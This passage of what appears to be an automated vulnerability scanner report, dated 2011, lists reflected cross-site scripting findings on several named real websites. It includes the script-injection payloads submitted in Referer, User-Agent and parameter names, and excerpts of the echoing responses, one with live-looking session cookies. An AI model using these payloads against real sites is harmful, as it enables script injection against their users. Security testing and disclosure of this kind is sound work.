The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85f9e"%3balert(1)//ad70704b4a9 was submitted in the Referer HTTP header. This input was echoed as 85f9e";alert(1)//ad70704b4a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 243eb"><script>alert(1)</script>bc93ac1cd73 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb66f"><script>alert(1)</script>4037935a9a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload f1901<script>alert(1)</script>a5ecaf5203a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8568"><script>alert(1)</script>9db11d77501 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f149a"-alert(1)-"255280f886e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" version="XHTML+RDFa 1 ...[SNIP]... <![CDATA[ /* You may give each page an identifying name, server, and channel on the next lines. */
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb369'-alert(1)-'7658685b4f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bf8"><script>alert(1)</script>b2ee995e5d6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3de68"><a>51b72db6471 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 5b25e<script>alert(1)</script>1a0cb81415e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7ddc9<script>alert(1)</script>4fe15cfe632 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> <head><title> Welcome to MetaPress </title><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" /><link hr ...[SNIP]... <br>HTTP User Agent: 7ddc9<script>alert(1)</script>4fe15cfe632<br> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3dca2'-alert(1)-'4810f0b2578 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into an HTML comment. The payload a6aae--><script>alert(1)</script>afbe724f576 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:12:57 GMT
Server: Apache
Content-Length: 381
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
<html><head> <!-- The server is oma-www36.xosn.com/10.3.9.171--><!-- The time is 04/02/2011 10:12:57 AM EST--><!-- The referer is http://www.google.com/search?hl=en&q=a6aae--><script>alert(1)</script>afbe724f576--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b600'-alert(1)-'0ea4449f546 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55df7'-alert(1)-'e1ef2702f3d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sat, 02 Apr 2011 15:27:43 GMT
P3p: policyref="http://www.pacificpoker.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP CAO COR UNI COM NAV"
Cache-control: no-cache
Content-type: text/html;charset=ISO-8859-1
Set-cookie: MyCookie=gln1-sol10-147; Domain=.pacificpoker.com; Path=/
Set-cookie: JSESSIONID=5A73E8060C86084669053EE82D5B0141; Domain=.pacificpoker.com
Set-cookie: OANID=gomipcpenib7ef4fc6c3e9c4414ff9ee8c; Domain=.pacificpoker.com; Expires=Sun, 02-Oct-2011 15:27:43 GMT; Path=/
Set-cookie: scut=lang**en__s**615638281852611860__os**615638281852611860__sr**945185__osr**945185__flag**No__l**__ic**51__st**0__bc**0__anid**gomipcpenib7ef4fc6c3e9c4414ff9ee8c__se**900000__osadcampaign**; Domain=.pacificpoker.com; Path=/
Content-Length: 73530
<!-- gln1-sol10-147 --><!-- / -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN ...[SNIP]... "gomipcpenib7ef4fc6c3e9c4414ff9ee8c"; var showCurHP = "false"; var sVer7 = "false"; var sSESerial = "900000"; var sUserAgent = 'curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.355df7'-alert(1)-'e1ef2702f3d'; var flashURL = "null"; var italyDomain = "special.servletmaxlife.com"; var unknown = "true"; var sOsadcampaign = ""; var Domain = "www.pacificpoker.com";
The value of the Referer HTTP header is copied into an HTML comment. The payload 548a7--><script>alert(1)</script>bb4f9ff3fde was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into an HTML comment. The payload f2dbd--><script>alert(1)</script>6037b7be2a6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 157e7'-alert(1)-'f898fdcea0f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abea2'-alert(1)-'25682bbcd9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74e06"-alert(1)-"034d1bf96e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83eff'-alert(1)-'f714e089ce6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef66e'-alert(1)-'370dc472c34 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... if redirection to international page is needed. If needed, return the URL var redirectToInternationalPageURL = '/International.aspx?origref=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3def66e'-alert(1)-'370dc472c34';
//Redirect users to International.aspx, that don't have a cookie set and //don't have Site id passed in the query string and the request came to tiffany.com. if((redirectToIn ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ba0a"><script>alert(1)</script>ab38a3dd817 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4112'-alert(1)-'e51c450e111 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2deb6</script><script>alert(1)</script>4c5b8a89a54 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf9d9'-alert(1)-'1f68a952df2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de661'-alert(1)-'1cd2301d5dc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a9a"><script>alert(1)</script>d2e55111866 was submitted in the Referer HTTP header. This input was echoed as 55a9a\"><script>alert(1)</script>d2e55111866 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
2.99. http://www.8tracks.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.8tracks.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2d0a<script>alert(1)</script>b7a0edcfda0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Redirecting to <a href="http://8tracks.com/?b2d0a<script>alert(1)</script>b7a0edcfda0=1">http://8tracks.com/?b2d0a<script>alert(1)</script>b7a0edcfda0=1</a>
2.100. http://www.8tracks.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.8tracks.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 539e3"><script>alert(1)</script>637fde56121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Redirecting to <a href="http://8tracks.com/?539e3"><script>alert(1)</script>637fde56121=1">http://8tracks.com/?539e3"><script>alert(1)</script>637fde56121=1</a>
2.101. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Firm
Host: http://www.alamo.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 828c9</title><a>03c6aeed4e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.alamo.com/?828c9</title><a>03c6aeed4e1=1</TITLE></HEAD><BODY><A HREF="https://www.alamo.com/?828c9</title><a>03c6aeed4e1=1">https://www.alamo.com/?828c9</tit ...[SNIP]...
2.102. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Firm
Host: http://www.alamo.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa32"><a>b27a94bfd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.alamo.com/?bfa32"><a>b27a94bfd2=1</TITLE></HEAD><BODY><A HREF="https://www.alamo.com/?bfa32"><a>b27a94bfd2=1">https://www.alamo.com/?bfa32"><a>b27a94bfd2=1</ ...[SNIP]...
2.103. http://www.alamo.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Firm
Host: http://www.alamo.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 333d9<a>d9aa5621cfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.alamo.com/?333d9<a>d9aa5621cfd=1</TITLE></HEAD><BODY><A HREF="https://www.alamo.com/?333d9<a>d9aa5621cfd=1">https://www.alamo.com/?333d9<a>d9aa5621cfd=1</A>< ...[SNIP]...
2.104. http://www.downloadsquad.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.downloadsquad.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2265"><script>alert(1)</script>c1f93e51337 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
2.105. http://www.force.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.force.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c4454<script>alert(1)</script>825772b2f33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
The URL has moved to <a href="http://www.salesforce.com/platform?c4454<script>alert(1)</script>825772b2f33=1">http://www.salesforce.com/platform?c4454<script>alert(1)</script>825772b2f33=1</a>
2.106. http://www.force.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.force.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e588e"><script>alert(1)</script>d061efa9f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
The URL has moved to <a href="http://www.salesforce.com/platform?e588e"><script>alert(1)</script>d061efa9f5e=1">http://www.salesforce.com/platform?e588e"><script>alert(1)</script>d061efa9f5e=1</a>
2.107. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Firm
Host: http://www.nationalcar.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 39c01</title><a>81980736ddf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.nationalcar.com/?39c01</title><a>81980736ddf=1</TITLE></HEAD><BODY><A HREF="https://www.nationalcar.com/?39c01</title><a>81980736ddf=1">https://www.nationalc ...[SNIP]...
2.108. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Firm
Host: http://www.nationalcar.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f55f"><a>e5ae426b094 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<HTML><HEAD><TITLE>Redirect to https://www.nationalcar.com/?8f55f"><a>e5ae426b094=1</TITLE></HEAD><BODY><A HREF="https://www.nationalcar.com/?8f55f"><a>e5ae426b094=1">https://www.nationalcar.com/?8f55 ...[SNIP]...
2.109. http://www.nationalcar.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Firm
Host: http://www.nationalcar.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0438<a>5e02ce9b27a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
